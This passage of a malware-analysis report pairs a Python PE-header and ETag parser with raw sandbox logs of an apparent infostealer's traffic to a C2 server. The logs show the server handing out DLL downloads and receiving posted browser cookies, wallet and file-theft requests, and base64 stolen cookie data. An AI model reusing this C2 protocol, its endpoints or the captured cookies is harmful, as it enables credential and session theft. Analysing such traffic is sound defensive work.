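"""Parse the PE header of a sandbox "Data Raw" download dump and cross-check it
against the HTTP headers. Added example for this report; not the sandbox vendor's code."""
import struct
from datetime import datetime, timezone
from typing import List, Tuple

_h = bytes.fromhex

# Sample input: first 592 bytes of the 196136-byte download (ETag "66cf75d3-2fe28"),
# re-typed from the report's hex dump; zero runs are written as bytes(n).
SAMPLE_HEADER = (
    _h("4d5a 9000 0300 0000 0400 0000 ffff 0000 b800 0000 0000 0000 4000 0000") + bytes(32)
    + _h("80000000")                                                    # e_lfanew = 0x80
    + _h("0e1fba0e00b409cd21b8014ccd21") + b"This program cannot be run in DOS mode.\r\r\n$" + bytes(7)
    + _h("50450000 4c01 0300 b775cf66 00000000 00000000 e000 0201")    # PE\0\0 + COFF header
    + _h("0b01 0b00 00d00200 00060000 00000000 5eee0200 00200000 00000300")  # optional hdr, PE32
    + _h("00004000 00200000 00020000 04000000 00000000 06000000 00000000 00400300"
         " 00020000 ad770300 0300 6085 00001000 00100000 00001000 00100000 00000000 10000000")
    + bytes(8) + _h("08ee0200 53000000") + _h("00000300 42020000") + bytes(8)      # dirs 0-3
    + _h("00d80200 28260000") + _h("00200300 0c000000") + _h("d0ec0200 1c000000")  # cert, reloc, debug
    + bytes(40) + _h("00200000 08000000") + bytes(8) + _h("08200000 48000000") + bytes(8)  # IAT, CLR
    + b".text\0\0\0" + _h("64ce0200 00200000 00d00200 00020000") + bytes(12) + _h("20000060")
    + b".rsrc\0\0\0" + _h("42020000 00000300 00040000 00d20200") + bytes(12) + _h("40000040")
    + b".reloc\0\0" + _h("0c000000 00200300 00020000 00d60200") + bytes(12) + _h("42000040")
    + bytes(16)                                                         # pad to file offset 0x200
    + _h("40ee0200 00000000")                                           # IAT at RVA 0x2000
    + _h("48000000 0200 0500 98dc0200 38100000 03000200 0f000006") + bytes(48)  # CLR header, RVA 0x2008
)

MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0x1C0: "arm", 0xAA64: "arm64"}
CLR_FLAGS = {0x1: "ILONLY", 0x2: "32BITREQUIRED", 0x8: "STRONGNAMESIGNED",
             0x10000: "TRACKDEBUGDATA", 0x20000: "32BITPREFERRED"}


def rva_to_offset(rva: int, sections: List[dict]) -> int:
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["rawptr"]
    raise ValueError("RVA 0x%x is not inside any section" % rva)


def parse_pe(data: bytes) -> dict:
    """Read DOS, COFF, optional header, data directories, section table and CLR header."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    machine, nsect, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    is_plus = magic == 0x20B
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    ndirs = struct.unpack_from("<I", data, opt + (108 if is_plus else 92))[0]
    dir_off = opt + (112 if is_plus else 96)
    dirs = [struct.unpack_from("<II", data, dir_off + 8 * i) for i in range(min(ndirs, 16))]
    sections = []
    for i in range(nsect):
        name, vsize, va, rawsize, rawptr, _, _, _, _, ch = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "vsize": vsize, "va": va,
                         "rawsize": rawsize, "rawptr": rawptr, "characteristics": ch})
    info = {"machine": machine, "machine_name": MACHINES.get(machine, "0x%x" % machine),
            "pe32plus": is_plus, "timestamp": ts,
            "compile_time_utc": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
            "entry_point": entry, "subsystem": subsystem, "sections": sections,
            "certificate": dirs[4] if len(dirs) > 4 else (0, 0),
            "is_dotnet": False, "clr_flags": None, "clr_entry_token": None, "clr_flag_names": []}
    if len(dirs) > 14 and dirs[14][0]:          # directory 14 = CLR runtime header
        off = rva_to_offset(dirs[14][0], sections)
        _, _, _, _, _, flags, token = struct.unpack_from("<IHHIIII", data, off)
        info.update(is_dotnet=True, clr_flags=flags, clr_entry_token=token,
                    clr_flag_names=[n for b, n in CLR_FLAGS.items() if flags & b])
    return info


def certificate_ends_at(info: dict, content_length: int) -> bool:
    """True when the Certificate Table (an appended Authenticode blob) runs to the last
    byte of the file. Its presence says nothing about whether the signature verifies."""
    off, size = info["certificate"]
    return size > 0 and off + size == content_length


def parse_nginx_etag(etag: str) -> Tuple[int, int]:
    """nginx ETags are '<mtime hex>-<size hex>'; returns (mtime as Unix epoch, size)."""
    mtime, size = etag.strip('"').split("-")
    return int(mtime, 16), int(size, 16)


if __name__ == "__main__":
    info = parse_pe(SAMPLE_HEADER)
    mtime, size = parse_nginx_etag('"66cf75d3-2fe28"')
    print("%s PE32%s, sections %s, entry 0x%x, subsystem %d" % (
        info["machine_name"], "+" if info["pe32plus"] else "",
        [s["name"] for s in info["sections"]], info["entry_point"], info["subsystem"]))
    print("compiled %s UTC (0x%x), server mtime 0x%x: built %d s before upload" % (
        info["compile_time_utc"], info["timestamp"], mtime, mtime - info["timestamp"]))
    print(".NET: %s %s" % (info["is_dotnet"], info["clr_flag_names"]))
    print("certificate table ends at Content-Length %d: %s" % (size, certificate_ends_at(info, size)))
```

On that sample it reports a 32-bit (0x14c) PE32 console-subsystem image with .text/.rsrc/.reloc, a CLR header with ILONLY|32BITREQUIRED|32BITPREFERRED, a Certificate Table at 0x2d800+0x2628 that ends exactly at byte 196136, and TimeDateStamp 0x66cf75b7 (2024-08-28 19:08:39 UTC), 28 seconds before the ETag mtime 0x66cf75d3. Fed the other dumps, the same code shows the 2459136-byte file (7 sections, stamp 0x6560a869) was built one second before its ETag mtime 0x6560a86a, while the six files whose ETags start with 6315a9f4 share a single September 2022 upload time and carry older stamps (0x631234f3 for the 685392-byte one), the pattern of files staged once and served unchanged.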
Source: global traffic HTTP traffic detected: GET /jamelwt HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jamelwt HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=c502aee2533efa76c5_13289933752292435604
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFCHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 44 31 45 33 34 31 42 31 37 41 32 39 37 34 31 36 34 32 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="hwid"07D1E341B17A2974164258------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="build"default------AAEBAFBGIDHCBFHIECFC--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 2d 2d 0d 0a Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="message"browsers------DBFIEHDHIIIECAAKECFH--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDBHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="message"plugins------KKJDGDHIDBGIECBGHJDB--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHIHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 2d 2d 0d 0a Data Ascii: ------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="message"fplugins------GIJKKKFCFHCFIECBGDHI--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGIIDBKEBFBGCAEBAKHost: 46.8.231.109Content-Length: 8339Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFHHost: 46.8.231.109Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 2d 2d 0d 0a Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzY1NDEJMVBfSkFSCTIwMjMtMTAtMDUtMDcKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk1NzQwCU5JRAk1MTE9bk5hZHFXOXVUY1kwT1A2STNhZm5yNzFvNkV6YVl
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFCHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 2d 2d 0d 0a Data Ascii: ------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="file"------CBGCBKFBGIIIECAAAKFC--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCFHIDAKECFHIEBFCGIHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 49 2d 2d 0d 0a Data Ascii: ------DGCFHIDAKECFHIEBFCGIContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------DGCFHIDAKECFHIEBFCGIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DGCFHIDAKECFHIEBFCGIContent-Disposition: form-data; name="file"------DGCFHIDAKECFHIEBFCGI--
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHHost: 46.8.231.109Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 2d 2d 0d 0a Data Ascii: ------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="message"wallets------EGDBFIIECBGDGDGDHCAK--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEHHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------JDGCGHCGHCBFHJJKKJEHContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------JDGCGHCGHCBFHJJKKJEHContent-Disposition: form-data; name="message"files------JDGCGHCGHCBFHJJKKJEH--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHIHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 33 33 33 39 64 63 34 65 64 33 32 31 39 64 30 32 34 38 62 63 66 34 63 64 38 61 66 64 65 32 65 39 35 66 39 35 62 62 37 66 64 31 39 65 32 30 30 38 66 62 38 33 65 36 31 30 30 61 33 62 32 63 39 38 61 32 61 66 64 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 2d 2d 0d 0a Data Ascii: ------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="token"813339dc4ed3219d0248bcf4cd8afde2e95f95bb7fd19e2008fb83e6100a3b2c98a2afd0------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; 